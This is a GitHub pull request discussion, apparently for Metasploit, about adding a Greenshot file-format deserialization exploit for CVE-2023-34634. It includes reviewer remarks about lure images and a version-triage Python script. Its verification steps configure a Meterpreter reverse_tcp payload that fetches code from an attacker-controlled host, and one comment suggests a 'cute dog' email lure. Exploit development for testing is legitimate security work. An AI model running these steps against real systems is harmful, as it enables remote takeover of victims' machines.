Add CVE-2023-34634, Greenshot Fileformat exploit #18253
modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb
I think the use case most likely here is to infect a Greenshot image on a share drive or as an attachment. Even if we used a 1 px image, the application itself would still be open, and then it would be an empty image that I think would be more concerning. I included an image mostly just for testing purposes, though emailing it to me and saying "Look at this cute dog" might just get me.
Looks good to me; the image itself is the exploit, rather than a byproduct/side-effect that shows to the user.
Happy to land once all goes green 👍
Release Notes
This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.
@cgranleese-r7 could you test the latest unstable release from Greenshot? Is that one also vulnerable?
@AkechiShiro, please see the documentation and description of the module:
I did not do an analysis to determine if there's a workaround or why the vulnerability is patched, but I was not able to get this exploit to work on anything newer than 1.3.274.
@bwatters-r7 I'm sorry, but I've gotten really confused with the way releases/changelog and security fixes are handled by Greenshot.
It would be easier, just at a glance, to know which version is fixed or not.
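The version question raised in the last two comments (which Greenshot builds fall inside the range the release note names) is the kind of thing an inventory triage script answers. The following is an added example, not code from this PR or from the Greenshot project: it parses dotted version strings, compares them against the boundary the release note gives (1.3.274 and earlier reported affected), and flags hosts in a constructed sample inventory. The hostnames, the inventory format and the "1.3.275" build are assumptions made for the example; the PR itself says no root-cause analysis was done on newer builds, so the script reports "within the reported-affected range" rather than "fixed".

```python
# Added example (not from the Metasploit PR or the Greenshot project).
# Flags Greenshot version strings against the boundary stated in this PR's
# release note: 1.3.274 and earlier are reported affected. Builds above that
# boundary are only "not reported", since the PR did no root-cause analysis.

import re
from typing import Iterable, List, Tuple

# Boundary taken from the PR release note; everything <= this is reported affected.
LAST_AFFECTED = "1.3.274"


def parse_version(v: str) -> Tuple[int, ...]:
    """Parse dotted numeric versions such as '1.2.10.6' or '1.3.274' into a tuple.

    A leading 'v' and trailing non-numeric qualifiers (e.g. '-unstable') are
    ignored. Components missing on one side compare as zero (see _pad below).
    """
    m = re.match(r"^\s*v?(\d+(?:\.\d+)*)", v)
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def _pad(a: Tuple[int, ...], b: Tuple[int, ...]) -> Tuple[Tuple[int, ...], Tuple[int, ...]]:
    """Right-pad the shorter tuple with zeros so '1.3' compares as '1.3.0'."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def is_reported_affected(v: str, last_affected: str = LAST_AFFECTED) -> bool:
    """True when v is at or below the last version the release note reports as affected."""
    a, b = _pad(parse_version(v), parse_version(last_affected))
    return a <= b


def triage(inventory: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return the (hostname, version) pairs that fall in the reported-affected range."""
    return [(host, ver) for host, ver in inventory if is_reported_affected(ver)]


# Constructed sample inventory; hostnames are made up for illustration.
SAMPLE_INVENTORY = [
    ("ws-01", "1.2.10.6"),  # last stable release named in the PR
    ("ws-02", "1.3.274"),   # boundary version named in the PR
    ("ws-03", "1.3.275"),   # hypothetical newer build, not on the page
]

if __name__ == "__main__":
    for host, ver in triage(SAMPLE_INVENTORY):
        print(f"{host}: Greenshot {ver} is within the reported-affected range")
```

The comparison is deliberately inclusive at the boundary, because the release note names 1.3.274 itself as affected; anything that parses above it is left out of the list but is not asserted to be patched.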
This is not working currently and is a placeholder.
This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.
Verification
msfconsole
use exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634
set payload cmd/windows/http/x64/meterpreter/reverse_tcp
set FETCH_SRVHOST 10.5.135.201
set LHOST 10.5.135.201
set FETCH_WRITABLE_DIR %TEMP%
set DisablePayloadHandler false
set wfsdelay 600
run